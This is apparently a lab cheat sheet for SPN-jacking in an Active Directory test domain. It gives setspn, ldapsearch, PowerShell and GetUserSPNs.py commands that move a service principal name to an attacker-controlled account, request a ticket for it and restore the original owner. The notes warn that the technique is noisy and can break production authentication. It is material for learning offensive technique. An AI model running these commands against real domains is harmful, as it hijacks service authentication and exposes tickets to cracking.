SPN-jacking moves an existing SPN from the legitimate owner to an account we control. After the move, Kerberos tickets for that service are encrypted with our account key. This can break the real service, but it is an important primitive for understanding SPN ownership and Kerberos routing.
Check current owner
setspn -Q HTTP/web01.ootw.local
setspn -L OOTW\svc_web
LDAP owner lookup
ldapsearch -LLL -x -H ldap://10.10.10.200 -D "ootw.local\\student" -w 'student' -b "DC=ootw,DC=local" '(servicePrincipalName=HTTP/web01.ootw.local)' sAMAccountName distinguishedName servicePrincipalName
Remove from old owner
setspn -D HTTP/web01.ootw.local OOTW\svc_web
Add to controlled owner
setspn -S HTTP/web01.ootw.local OOTW\student
PowerShell move
Set-ADUser -Identity svc_web -ServicePrincipalNames @{Remove='HTTP/web01.ootw.local'}
Set-ADUser -Identity student -ServicePrincipalNames @{Add='HTTP/web01.ootw.local'}
Request ticket for hijacked SPN
GetUserSPNs.py ootw.local/student:'student' -dc-ip 10.10.10.200 -request-user student -outputfile hijacked.hash
Restore original owner
setspn -D HTTP/web01.ootw.local OOTW\student
setspn -S HTTP/web01.ootw.local OOTW\svc_web
setspn -Q HTTP/web01.ootw.local
Duplicate check
setspn -X
Notes
- SPN-jacking is noisy and can break production authentication.
- The KDC encrypts the ticket to the current SPN owner.
- If the real service still runs as the old owner, clients may receive
KRB_AP_ERR_MODIFIED. - Use this in labs to understand ownership, not as a casual first option.